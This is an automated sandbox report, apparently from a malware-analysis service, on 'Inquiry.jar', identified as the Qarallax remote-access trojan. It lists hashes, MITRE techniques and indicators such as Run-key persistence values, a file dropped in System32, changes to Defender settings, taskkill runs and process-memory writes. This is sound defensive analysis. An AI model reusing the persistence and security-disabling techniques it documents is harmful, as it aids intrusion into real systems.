qarallax | 2540f6138141298d986aa920209ad387686df0ffb9d715245aa1619a9776382d

Analysis

max time kernel
134s
max time network
157s
platform
windows10_x64
resource
win10v200722
submitted
19-08-2020 13:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Inquiry.jar
Size

399KB
MD5

5352736e23d73f99115747c7d3813320
SHA1

79c0cac4a1fcd477e215cdcc57e740e911d79caf
SHA256

2540f6138141298d986aa920209ad387686df0ffb9d715245aa1619a9776382d
SHA512

2c3cb218f0319a44a4ce65fe76b04af07e9bcaec5fbb6055ee099d382464d4d8d239c33086217072f82e344ca30e6850c62169dea3e0a4e092ac3590dd4cd30f

Score

10^/10

persistence trojan qarallax evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae8e-61.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
508	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DhjUvlC = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\DNVJe\\AWHZt.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run\DhjUvlC = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\DNVJe\\AWHZt.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\DNVJe\Desktop.ini	java.exe
File created	C:\Users\Admin\DNVJe\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\DNVJe\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\DNVJe\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\lcMqe	java.exe
File created	C:\Windows\System32\lcMqe	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
4464	taskkill.exe
4768	taskkill.exe
5096	taskkill.exe
5076	taskkill.exe
4108	taskkill.exe
2520	taskkill.exe
4892	taskkill.exe
1676	taskkill.exe
4508	taskkill.exe
4492	taskkill.exe
2692	taskkill.exe
4840	taskkill.exe
3768	taskkill.exe
1588	taskkill.exe
3036	taskkill.exe
3820	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1528	powershell.exe
1528	powershell.exe
1528	powershell.exe

Suspicious use of AdjustPrivilegeToken 122 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3088	WMIC.exe
Token: SeSecurityPrivilege	3088	WMIC.exe
Token: SeTakeOwnershipPrivilege	3088	WMIC.exe
Token: SeLoadDriverPrivilege	3088	WMIC.exe
Token: SeSystemProfilePrivilege	3088	WMIC.exe
Token: SeSystemtimePrivilege	3088	WMIC.exe
Token: SeProfSingleProcessPrivilege	3088	WMIC.exe
Token: SeIncBasePriorityPrivilege	3088	WMIC.exe
Token: SeCreatePagefilePrivilege	3088	WMIC.exe
Token: SeBackupPrivilege	3088	WMIC.exe
Token: SeRestorePrivilege	3088	WMIC.exe
Token: SeShutdownPrivilege	3088	WMIC.exe
Token: SeDebugPrivilege	3088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3088	WMIC.exe
Token: SeRemoteShutdownPrivilege	3088	WMIC.exe
Token: SeUndockPrivilege	3088	WMIC.exe
Token: SeManageVolumePrivilege	3088	WMIC.exe
Token: 33	3088	WMIC.exe
Token: 34	3088	WMIC.exe
Token: 35	3088	WMIC.exe
Token: 36	3088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3088	WMIC.exe
Token: SeSecurityPrivilege	3088	WMIC.exe
Token: SeTakeOwnershipPrivilege	3088	WMIC.exe
Token: SeLoadDriverPrivilege	3088	WMIC.exe
Token: SeSystemProfilePrivilege	3088	WMIC.exe
Token: SeSystemtimePrivilege	3088	WMIC.exe
Token: SeProfSingleProcessPrivilege	3088	WMIC.exe
Token: SeIncBasePriorityPrivilege	3088	WMIC.exe
Token: SeCreatePagefilePrivilege	3088	WMIC.exe
Token: SeBackupPrivilege	3088	WMIC.exe
Token: SeRestorePrivilege	3088	WMIC.exe
Token: SeShutdownPrivilege	3088	WMIC.exe
Token: SeDebugPrivilege	3088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3088	WMIC.exe
Token: SeRemoteShutdownPrivilege	3088	WMIC.exe
Token: SeUndockPrivilege	3088	WMIC.exe
Token: SeManageVolumePrivilege	3088	WMIC.exe
Token: 33	3088	WMIC.exe
Token: 34	3088	WMIC.exe
Token: 35	3088	WMIC.exe
Token: 36	3088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4044	WMIC.exe
Token: SeSecurityPrivilege	4044	WMIC.exe
Token: SeTakeOwnershipPrivilege	4044	WMIC.exe
Token: SeLoadDriverPrivilege	4044	WMIC.exe
Token: SeSystemProfilePrivilege	4044	WMIC.exe
Token: SeSystemtimePrivilege	4044	WMIC.exe
Token: SeProfSingleProcessPrivilege	4044	WMIC.exe
Token: SeIncBasePriorityPrivilege	4044	WMIC.exe
Token: SeCreatePagefilePrivilege	4044	WMIC.exe
Token: SeBackupPrivilege	4044	WMIC.exe
Token: SeRestorePrivilege	4044	WMIC.exe
Token: SeShutdownPrivilege	4044	WMIC.exe
Token: SeDebugPrivilege	4044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4044	WMIC.exe
Token: SeRemoteShutdownPrivilege	4044	WMIC.exe
Token: SeUndockPrivilege	4044	WMIC.exe
Token: SeManageVolumePrivilege	4044	WMIC.exe
Token: 33	4044	WMIC.exe
Token: 34	4044	WMIC.exe
Token: 35	4044	WMIC.exe
Token: 36	4044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4044	WMIC.exe
Token: SeSecurityPrivilege	4044	WMIC.exe
Token: SeTakeOwnershipPrivilege	4044	WMIC.exe
Token: SeLoadDriverPrivilege	4044	WMIC.exe
Token: SeSystemProfilePrivilege	4044	WMIC.exe
Token: SeSystemtimePrivilege	4044	WMIC.exe
Token: SeProfSingleProcessPrivilege	4044	WMIC.exe
Token: SeIncBasePriorityPrivilege	4044	WMIC.exe
Token: SeCreatePagefilePrivilege	4044	WMIC.exe
Token: SeBackupPrivilege	4044	WMIC.exe
Token: SeRestorePrivilege	4044	WMIC.exe
Token: SeShutdownPrivilege	4044	WMIC.exe
Token: SeDebugPrivilege	4044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4044	WMIC.exe
Token: SeRemoteShutdownPrivilege	4044	WMIC.exe
Token: SeUndockPrivilege	4044	WMIC.exe
Token: SeManageVolumePrivilege	4044	WMIC.exe
Token: 33	4044	WMIC.exe
Token: 34	4044	WMIC.exe
Token: 35	4044	WMIC.exe
Token: 36	4044	WMIC.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	3036	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1528	powershell.exe
Token: SeSecurityPrivilege	1528	powershell.exe
Token: SeTakeOwnershipPrivilege	1528	powershell.exe
Token: SeLoadDriverPrivilege	1528	powershell.exe
Token: SeSystemProfilePrivilege	1528	powershell.exe
Token: SeSystemtimePrivilege	1528	powershell.exe
Token: SeProfSingleProcessPrivilege	1528	powershell.exe
Token: SeIncBasePriorityPrivilege	1528	powershell.exe
Token: SeCreatePagefilePrivilege	1528	powershell.exe
Token: SeBackupPrivilege	1528	powershell.exe
Token: SeRestorePrivilege	1528	powershell.exe
Token: SeShutdownPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeSystemEnvironmentPrivilege	1528	powershell.exe
Token: SeRemoteShutdownPrivilege	1528	powershell.exe
Token: SeUndockPrivilege	1528	powershell.exe
Token: SeManageVolumePrivilege	1528	powershell.exe
Token: 33	1528	powershell.exe
Token: 34	1528	powershell.exe
Token: 35	1528	powershell.exe
Token: 36	1528	powershell.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	4892	taskkill.exe
Token: SeDebugPrivilege	4464	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	5096	taskkill.exe
Token: SeDebugPrivilege	5076	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	2692	taskkill.exe
Token: SeDebugPrivilege	4108	taskkill.exe
Token: SeDebugPrivilege	4840	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
508	java.exe

Suspicious use of WriteProcessMemory 382 IoCs

description	pid	Process	procid_target
PID 508 wrote to memory of 2356	508	java.exe	67
PID 508 wrote to memory of 2356	508	java.exe	67
PID 508 wrote to memory of 2688	508	java.exe	69
PID 508 wrote to memory of 2688	508	java.exe	69
PID 2688 wrote to memory of 3088	2688	cmd.exe	71
PID 2688 wrote to memory of 3088	2688	cmd.exe	71
PID 508 wrote to memory of 3828	508	java.exe	72
PID 508 wrote to memory of 3828	508	java.exe	72
PID 3828 wrote to memory of 4044	3828	cmd.exe	74
PID 3828 wrote to memory of 4044	3828	cmd.exe	74
PID 508 wrote to memory of 3640	508	java.exe	75
PID 508 wrote to memory of 3640	508	java.exe	75
PID 508 wrote to memory of 3648	508	java.exe	77
PID 508 wrote to memory of 3648	508	java.exe	77
PID 508 wrote to memory of 4068	508	java.exe	79
PID 508 wrote to memory of 4068	508	java.exe	79
PID 508 wrote to memory of 1828	508	java.exe	80
PID 508 wrote to memory of 1828	508	java.exe	80
PID 508 wrote to memory of 3140	508	java.exe	82
PID 508 wrote to memory of 3140	508	java.exe	82
PID 508 wrote to memory of 3104	508	java.exe	84
PID 508 wrote to memory of 3104	508	java.exe	84
PID 508 wrote to memory of 3892	508	java.exe	86
PID 508 wrote to memory of 3892	508	java.exe	86
PID 508 wrote to memory of 2812	508	java.exe	88
PID 508 wrote to memory of 2812	508	java.exe	88
PID 508 wrote to memory of 1040	508	java.exe	91
PID 508 wrote to memory of 1040	508	java.exe	91
PID 508 wrote to memory of 1528	508	java.exe	93
PID 508 wrote to memory of 1528	508	java.exe	93
PID 508 wrote to memory of 1588	508	java.exe	94
PID 508 wrote to memory of 1588	508	java.exe	94
PID 508 wrote to memory of 1844	508	java.exe	97
PID 508 wrote to memory of 1844	508	java.exe	97
PID 508 wrote to memory of 1892	508	java.exe	98
PID 508 wrote to memory of 1892	508	java.exe	98
PID 508 wrote to memory of 2352	508	java.exe	101
PID 508 wrote to memory of 2352	508	java.exe	101
PID 508 wrote to memory of 2348	508	java.exe	102
PID 508 wrote to memory of 2348	508	java.exe	102
PID 508 wrote to memory of 4052	508	java.exe	105
PID 508 wrote to memory of 4052	508	java.exe	105
PID 508 wrote to memory of 1724	508	java.exe	106
PID 508 wrote to memory of 1724	508	java.exe	106
PID 508 wrote to memory of 4036	508	java.exe	109
PID 508 wrote to memory of 4036	508	java.exe	109
PID 508 wrote to memory of 4060	508	java.exe	110
PID 508 wrote to memory of 4060	508	java.exe	110
PID 508 wrote to memory of 3844	508	java.exe	113
PID 508 wrote to memory of 3844	508	java.exe	113
PID 508 wrote to memory of 3740	508	java.exe	115
PID 508 wrote to memory of 3740	508	java.exe	115
PID 508 wrote to memory of 2104	508	java.exe	117
PID 508 wrote to memory of 2104	508	java.exe	117
PID 1040 wrote to memory of 2384	1040	cmd.exe	118
PID 1040 wrote to memory of 2384	1040	cmd.exe	118
PID 508 wrote to memory of 3080	508	java.exe	120
PID 508 wrote to memory of 3080	508	java.exe	120
PID 508 wrote to memory of 2076	508	java.exe	122
PID 508 wrote to memory of 2076	508	java.exe	122
PID 508 wrote to memory of 2348	508	java.exe	125
PID 508 wrote to memory of 2348	508	java.exe	125
PID 508 wrote to memory of 992	508	java.exe	127
PID 508 wrote to memory of 992	508	java.exe	127
PID 1040 wrote to memory of 2936	1040	cmd.exe	128
PID 1040 wrote to memory of 2936	1040	cmd.exe	128
PID 508 wrote to memory of 3036	508	java.exe	129
PID 508 wrote to memory of 3036	508	java.exe	129
PID 508 wrote to memory of 3992	508	java.exe	132
PID 508 wrote to memory of 3992	508	java.exe	132
PID 508 wrote to memory of 3732	508	java.exe	134
PID 508 wrote to memory of 3732	508	java.exe	134
PID 508 wrote to memory of 4056	508	java.exe	136
PID 508 wrote to memory of 4056	508	java.exe	136
PID 508 wrote to memory of 2104	508	java.exe	138
PID 508 wrote to memory of 2104	508	java.exe	138
PID 508 wrote to memory of 2320	508	java.exe	140
PID 508 wrote to memory of 2320	508	java.exe	140
PID 508 wrote to memory of 4052	508	java.exe	142
PID 508 wrote to memory of 4052	508	java.exe	142
PID 4052 wrote to memory of 1124	4052	cmd.exe	144
PID 4052 wrote to memory of 1124	4052	cmd.exe	144
PID 4052 wrote to memory of 1416	4052	cmd.exe	145
PID 4052 wrote to memory of 1416	4052	cmd.exe	145
PID 508 wrote to memory of 3820	508	java.exe	146
PID 508 wrote to memory of 3820	508	java.exe	146
PID 508 wrote to memory of 1688	508	java.exe	147
PID 508 wrote to memory of 1688	508	java.exe	147
PID 1688 wrote to memory of 1372	1688	cmd.exe	150
PID 1688 wrote to memory of 1372	1688	cmd.exe	150
PID 1688 wrote to memory of 1476	1688	cmd.exe	151
PID 1688 wrote to memory of 1476	1688	cmd.exe	151
PID 508 wrote to memory of 988	508	java.exe	152
PID 508 wrote to memory of 988	508	java.exe	152
PID 988 wrote to memory of 3964	988	cmd.exe	154
PID 988 wrote to memory of 3964	988	cmd.exe	154
PID 988 wrote to memory of 3932	988	cmd.exe	155
PID 988 wrote to memory of 3932	988	cmd.exe	155
PID 508 wrote to memory of 2100	508	java.exe	156
PID 508 wrote to memory of 2100	508	java.exe	156
PID 2100 wrote to memory of 2960	2100	cmd.exe	159
PID 2100 wrote to memory of 2960	2100	cmd.exe	159
PID 2100 wrote to memory of 3912	2100	cmd.exe	160
PID 2100 wrote to memory of 3912	2100	cmd.exe	160
PID 508 wrote to memory of 3948	508	java.exe	161
PID 508 wrote to memory of 3948	508	java.exe	161
PID 3948 wrote to memory of 3996	3948	cmd.exe	163
PID 3948 wrote to memory of 3996	3948	cmd.exe	163
PID 3948 wrote to memory of 964	3948	cmd.exe	164
PID 3948 wrote to memory of 964	3948	cmd.exe	164
PID 508 wrote to memory of 3732	508	java.exe	165
PID 508 wrote to memory of 3732	508	java.exe	165
PID 3732 wrote to memory of 1844	3732	cmd.exe	167
PID 3732 wrote to memory of 1844	3732	cmd.exe	167
PID 3732 wrote to memory of 1948	3732	cmd.exe	168
PID 3732 wrote to memory of 1948	3732	cmd.exe	168
PID 508 wrote to memory of 1476	508	java.exe	169
PID 508 wrote to memory of 1476	508	java.exe	169
PID 1476 wrote to memory of 3964	1476	cmd.exe	171
PID 1476 wrote to memory of 3964	1476	cmd.exe	171
PID 1476 wrote to memory of 3564	1476	cmd.exe	172
PID 1476 wrote to memory of 3564	1476	cmd.exe	172
PID 508 wrote to memory of 1568	508	java.exe	173
PID 508 wrote to memory of 1568	508	java.exe	173
PID 1568 wrote to memory of 348	1568	cmd.exe	175
PID 1568 wrote to memory of 348	1568	cmd.exe	175
PID 508 wrote to memory of 2520	508	java.exe	176
PID 508 wrote to memory of 2520	508	java.exe	176
PID 1568 wrote to memory of 3840	1568	cmd.exe	178
PID 1568 wrote to memory of 3840	1568	cmd.exe	178
PID 508 wrote to memory of 3952	508	java.exe	179
PID 508 wrote to memory of 3952	508	java.exe	179
PID 3952 wrote to memory of 1540	3952	cmd.exe	181
PID 3952 wrote to memory of 1540	3952	cmd.exe	181
PID 3952 wrote to memory of 1844	3952	cmd.exe	182
PID 3952 wrote to memory of 1844	3952	cmd.exe	182
PID 508 wrote to memory of 1528	508	java.exe	183
PID 508 wrote to memory of 1528	508	java.exe	183
PID 1528 wrote to memory of 2348	1528	cmd.exe	185
PID 1528 wrote to memory of 2348	1528	cmd.exe	185
PID 1528 wrote to memory of 3980	1528	cmd.exe	186
PID 1528 wrote to memory of 3980	1528	cmd.exe	186
PID 508 wrote to memory of 3036	508	java.exe	187
PID 508 wrote to memory of 3036	508	java.exe	187
PID 3036 wrote to memory of 3836	3036	cmd.exe	189
PID 3036 wrote to memory of 3836	3036	cmd.exe	189
PID 3036 wrote to memory of 2808	3036	cmd.exe	190
PID 3036 wrote to memory of 2808	3036	cmd.exe	190
PID 508 wrote to memory of 3736	508	java.exe	191
PID 508 wrote to memory of 3736	508	java.exe	191
PID 3736 wrote to memory of 2692	3736	cmd.exe	193
PID 3736 wrote to memory of 2692	3736	cmd.exe	193
PID 3736 wrote to memory of 1848	3736	cmd.exe	194
PID 3736 wrote to memory of 1848	3736	cmd.exe	194
PID 508 wrote to memory of 3552	508	java.exe	195
PID 508 wrote to memory of 3552	508	java.exe	195
PID 3552 wrote to memory of 3980	3552	cmd.exe	197
PID 3552 wrote to memory of 3980	3552	cmd.exe	197
PID 3552 wrote to memory of 580	3552	cmd.exe	198
PID 3552 wrote to memory of 580	3552	cmd.exe	198
PID 508 wrote to memory of 2808	508	java.exe	199
PID 508 wrote to memory of 2808	508	java.exe	199
PID 2808 wrote to memory of 1844	2808	cmd.exe	201
PID 2808 wrote to memory of 1844	2808	cmd.exe	201
PID 2808 wrote to memory of 1848	2808	cmd.exe	202
PID 2808 wrote to memory of 1848	2808	cmd.exe	202
PID 508 wrote to memory of 2668	508	java.exe	203
PID 508 wrote to memory of 2668	508	java.exe	203
PID 508 wrote to memory of 3768	508	java.exe	205
PID 508 wrote to memory of 3768	508	java.exe	205
PID 2668 wrote to memory of 3924	2668	cmd.exe	207
PID 2668 wrote to memory of 3924	2668	cmd.exe	207
PID 2668 wrote to memory of 1848	2668	cmd.exe	208
PID 2668 wrote to memory of 1848	2668	cmd.exe	208
PID 508 wrote to memory of 4112	508	java.exe	209
PID 508 wrote to memory of 4112	508	java.exe	209
PID 4112 wrote to memory of 4156	4112	cmd.exe	211
PID 4112 wrote to memory of 4156	4112	cmd.exe	211
PID 4112 wrote to memory of 4176	4112	cmd.exe	212
PID 4112 wrote to memory of 4176	4112	cmd.exe	212
PID 508 wrote to memory of 4196	508	java.exe	213
PID 508 wrote to memory of 4196	508	java.exe	213
PID 4196 wrote to memory of 4232	4196	cmd.exe	215
PID 4196 wrote to memory of 4232	4196	cmd.exe	215
PID 4196 wrote to memory of 4252	4196	cmd.exe	216
PID 4196 wrote to memory of 4252	4196	cmd.exe	216
PID 508 wrote to memory of 4272	508	java.exe	217
PID 508 wrote to memory of 4272	508	java.exe	217
PID 4272 wrote to memory of 4308	4272	cmd.exe	219
PID 4272 wrote to memory of 4308	4272	cmd.exe	219
PID 4272 wrote to memory of 4328	4272	cmd.exe	220
PID 4272 wrote to memory of 4328	4272	cmd.exe	220
PID 508 wrote to memory of 4348	508	java.exe	221
PID 508 wrote to memory of 4348	508	java.exe	221
PID 4348 wrote to memory of 4384	4348	cmd.exe	223
PID 4348 wrote to memory of 4384	4348	cmd.exe	223
PID 4348 wrote to memory of 4404	4348	cmd.exe	224
PID 4348 wrote to memory of 4404	4348	cmd.exe	224
PID 508 wrote to memory of 4424	508	java.exe	225
PID 508 wrote to memory of 4424	508	java.exe	225
PID 4424 wrote to memory of 4460	4424	cmd.exe	227
PID 4424 wrote to memory of 4460	4424	cmd.exe	227
PID 4424 wrote to memory of 4480	4424	cmd.exe	228
PID 4424 wrote to memory of 4480	4424	cmd.exe	228
PID 508 wrote to memory of 4500	508	java.exe	229
PID 508 wrote to memory of 4500	508	java.exe	229
PID 4500 wrote to memory of 4536	4500	cmd.exe	231
PID 4500 wrote to memory of 4536	4500	cmd.exe	231
PID 4500 wrote to memory of 4556	4500	cmd.exe	232
PID 4500 wrote to memory of 4556	4500	cmd.exe	232
PID 508 wrote to memory of 4576	508	java.exe	233
PID 508 wrote to memory of 4576	508	java.exe	233
PID 4576 wrote to memory of 4612	4576	cmd.exe	235
PID 4576 wrote to memory of 4612	4576	cmd.exe	235
PID 4576 wrote to memory of 4632	4576	cmd.exe	236
PID 4576 wrote to memory of 4632	4576	cmd.exe	236
PID 508 wrote to memory of 4652	508	java.exe	237
PID 508 wrote to memory of 4652	508	java.exe	237
PID 4652 wrote to memory of 4688	4652	cmd.exe	239
PID 4652 wrote to memory of 4688	4652	cmd.exe	239
PID 4652 wrote to memory of 4708	4652	cmd.exe	240
PID 4652 wrote to memory of 4708	4652	cmd.exe	240
PID 508 wrote to memory of 4728	508	java.exe	241
PID 508 wrote to memory of 4728	508	java.exe	241
PID 4728 wrote to memory of 4764	4728	cmd.exe	243
PID 4728 wrote to memory of 4764	4728	cmd.exe	243
PID 4728 wrote to memory of 4784	4728	cmd.exe	244
PID 4728 wrote to memory of 4784	4728	cmd.exe	244
PID 508 wrote to memory of 4804	508	java.exe	245
PID 508 wrote to memory of 4804	508	java.exe	245
PID 4804 wrote to memory of 4840	4804	cmd.exe	247
PID 4804 wrote to memory of 4840	4804	cmd.exe	247
PID 4804 wrote to memory of 4860	4804	cmd.exe	248
PID 4804 wrote to memory of 4860	4804	cmd.exe	248
PID 508 wrote to memory of 4880	508	java.exe	249
PID 508 wrote to memory of 4880	508	java.exe	249
PID 508 wrote to memory of 4892	508	java.exe	250
PID 508 wrote to memory of 4892	508	java.exe	250
PID 4880 wrote to memory of 4976	4880	cmd.exe	253
PID 4880 wrote to memory of 4976	4880	cmd.exe	253
PID 4880 wrote to memory of 5008	4880	cmd.exe	254
PID 4880 wrote to memory of 5008	4880	cmd.exe	254
PID 508 wrote to memory of 5024	508	java.exe	255
PID 508 wrote to memory of 5024	508	java.exe	255
PID 5024 wrote to memory of 5060	5024	cmd.exe	257
PID 5024 wrote to memory of 5060	5024	cmd.exe	257
PID 5024 wrote to memory of 5080	5024	cmd.exe	258
PID 5024 wrote to memory of 5080	5024	cmd.exe	258
PID 508 wrote to memory of 5100	508	java.exe	259
PID 508 wrote to memory of 5100	508	java.exe	259
PID 5100 wrote to memory of 1848	5100	cmd.exe	261
PID 5100 wrote to memory of 1848	5100	cmd.exe	261
PID 5100 wrote to memory of 4160	5100	cmd.exe	262
PID 5100 wrote to memory of 4160	5100	cmd.exe	262
PID 508 wrote to memory of 1240	508	java.exe	263
PID 508 wrote to memory of 1240	508	java.exe	263
PID 1240 wrote to memory of 4156	1240	cmd.exe	265
PID 1240 wrote to memory of 4156	1240	cmd.exe	265
PID 1240 wrote to memory of 4188	1240	cmd.exe	266
PID 1240 wrote to memory of 4188	1240	cmd.exe	266
PID 508 wrote to memory of 4236	508	java.exe	267
PID 508 wrote to memory of 4236	508	java.exe	267
PID 4236 wrote to memory of 4280	4236	cmd.exe	269
PID 4236 wrote to memory of 4280	4236	cmd.exe	269
PID 4236 wrote to memory of 4320	4236	cmd.exe	270
PID 4236 wrote to memory of 4320	4236	cmd.exe	270
PID 508 wrote to memory of 4344	508	java.exe	271
PID 508 wrote to memory of 4344	508	java.exe	271
PID 4344 wrote to memory of 4412	4344	cmd.exe	273
PID 4344 wrote to memory of 4412	4344	cmd.exe	273
PID 4344 wrote to memory of 4416	4344	cmd.exe	274
PID 4344 wrote to memory of 4416	4344	cmd.exe	274
PID 508 wrote to memory of 4464	508	java.exe	275
PID 508 wrote to memory of 4464	508	java.exe	275
PID 508 wrote to memory of 4516	508	java.exe	277
PID 508 wrote to memory of 4516	508	java.exe	277
PID 4516 wrote to memory of 3896	4516	cmd.exe	279
PID 4516 wrote to memory of 3896	4516	cmd.exe	279
PID 4516 wrote to memory of 4648	4516	cmd.exe	280
PID 4516 wrote to memory of 4648	4516	cmd.exe	280
PID 508 wrote to memory of 4668	508	java.exe	281
PID 508 wrote to memory of 4668	508	java.exe	281
PID 4668 wrote to memory of 4720	4668	cmd.exe	283
PID 4668 wrote to memory of 4720	4668	cmd.exe	283
PID 4668 wrote to memory of 4768	4668	cmd.exe	284
PID 4668 wrote to memory of 4768	4668	cmd.exe	284
PID 508 wrote to memory of 4800	508	java.exe	285
PID 508 wrote to memory of 4800	508	java.exe	285
PID 4800 wrote to memory of 4852	4800	cmd.exe	287
PID 4800 wrote to memory of 4852	4800	cmd.exe	287
PID 4800 wrote to memory of 4872	4800	cmd.exe	288
PID 4800 wrote to memory of 4872	4800	cmd.exe	288
PID 508 wrote to memory of 4924	508	java.exe	289
PID 508 wrote to memory of 4924	508	java.exe	289
PID 4924 wrote to memory of 4936	4924	cmd.exe	291
PID 4924 wrote to memory of 4936	4924	cmd.exe	291
PID 4924 wrote to memory of 4892	4924	cmd.exe	292
PID 4924 wrote to memory of 4892	4924	cmd.exe	292
PID 508 wrote to memory of 4920	508	java.exe	293
PID 508 wrote to memory of 4920	508	java.exe	293
PID 4920 wrote to memory of 5068	4920	cmd.exe	295
PID 4920 wrote to memory of 5068	4920	cmd.exe	295
PID 4920 wrote to memory of 5060	4920	cmd.exe	296
PID 4920 wrote to memory of 5060	4920	cmd.exe	296
PID 508 wrote to memory of 5108	508	java.exe	297
PID 508 wrote to memory of 5108	508	java.exe	297
PID 5108 wrote to memory of 4128	5108	cmd.exe	299
PID 5108 wrote to memory of 4128	5108	cmd.exe	299
PID 5108 wrote to memory of 4192	5108	cmd.exe	300
PID 5108 wrote to memory of 4192	5108	cmd.exe	300
PID 508 wrote to memory of 4156	508	java.exe	301
PID 508 wrote to memory of 4156	508	java.exe	301
PID 4156 wrote to memory of 4324	4156	cmd.exe	303
PID 4156 wrote to memory of 4324	4156	cmd.exe	303
PID 4156 wrote to memory of 4332	4156	cmd.exe	304
PID 4156 wrote to memory of 4332	4156	cmd.exe	304
PID 508 wrote to memory of 4384	508	java.exe	305
PID 508 wrote to memory of 4384	508	java.exe	305
PID 4384 wrote to memory of 4488	4384	cmd.exe	307
PID 4384 wrote to memory of 4488	4384	cmd.exe	307
PID 4384 wrote to memory of 4624	4384	cmd.exe	308
PID 4384 wrote to memory of 4624	4384	cmd.exe	308
PID 508 wrote to memory of 3896	508	java.exe	309
PID 508 wrote to memory of 3896	508	java.exe	309
PID 3896 wrote to memory of 4476	3896	cmd.exe	311
PID 3896 wrote to memory of 4476	3896	cmd.exe	311
PID 3896 wrote to memory of 4464	3896	cmd.exe	312
PID 3896 wrote to memory of 4464	3896	cmd.exe	312
PID 508 wrote to memory of 4736	508	java.exe	313
PID 508 wrote to memory of 4736	508	java.exe	313
PID 4736 wrote to memory of 4768	4736	cmd.exe	315
PID 4736 wrote to memory of 4768	4736	cmd.exe	315
PID 4736 wrote to memory of 4876	4736	cmd.exe	316
PID 4736 wrote to memory of 4876	4736	cmd.exe	316
PID 508 wrote to memory of 4908	508	java.exe	317
PID 508 wrote to memory of 4908	508	java.exe	317
PID 4908 wrote to memory of 5000	4908	cmd.exe	319
PID 4908 wrote to memory of 5000	4908	cmd.exe	319
PID 4908 wrote to memory of 4892	4908	cmd.exe	320
PID 4908 wrote to memory of 4892	4908	cmd.exe	320
PID 508 wrote to memory of 5088	508	java.exe	321
PID 508 wrote to memory of 5088	508	java.exe	321
PID 5088 wrote to memory of 4172	5088	cmd.exe	323
PID 5088 wrote to memory of 4172	5088	cmd.exe	323
PID 5088 wrote to memory of 1676	5088	cmd.exe	324
PID 5088 wrote to memory of 1676	5088	cmd.exe	324
PID 508 wrote to memory of 4192	508	java.exe	325
PID 508 wrote to memory of 4192	508	java.exe	325
PID 4192 wrote to memory of 4320	4192	cmd.exe	327
PID 4192 wrote to memory of 4320	4192	cmd.exe	327
PID 4192 wrote to memory of 4468	4192	cmd.exe	328
PID 4192 wrote to memory of 4468	4192	cmd.exe	328
PID 508 wrote to memory of 4636	508	java.exe	329
PID 508 wrote to memory of 4636	508	java.exe	329
PID 4636 wrote to memory of 4616	4636	cmd.exe	331
PID 4636 wrote to memory of 4616	4636	cmd.exe	331
PID 4636 wrote to memory of 4480	4636	cmd.exe	332
PID 4636 wrote to memory of 4480	4636	cmd.exe	332
PID 508 wrote to memory of 4776	508	java.exe	333
PID 508 wrote to memory of 4776	508	java.exe	333
PID 508 wrote to memory of 4768	508	java.exe	335
PID 508 wrote to memory of 4768	508	java.exe	335
PID 4776 wrote to memory of 5012	4776	cmd.exe	337
PID 4776 wrote to memory of 5012	4776	cmd.exe	337
PID 4776 wrote to memory of 5080	4776	cmd.exe	338
PID 4776 wrote to memory of 5080	4776	cmd.exe	338
PID 508 wrote to memory of 1676	508	java.exe	339
PID 508 wrote to memory of 1676	508	java.exe	339
PID 508 wrote to memory of 4508	508	java.exe	341
PID 508 wrote to memory of 4508	508	java.exe	341
PID 508 wrote to memory of 5096	508	java.exe	343
PID 508 wrote to memory of 5096	508	java.exe	343
PID 508 wrote to memory of 5076	508	java.exe	345
PID 508 wrote to memory of 5076	508	java.exe	345
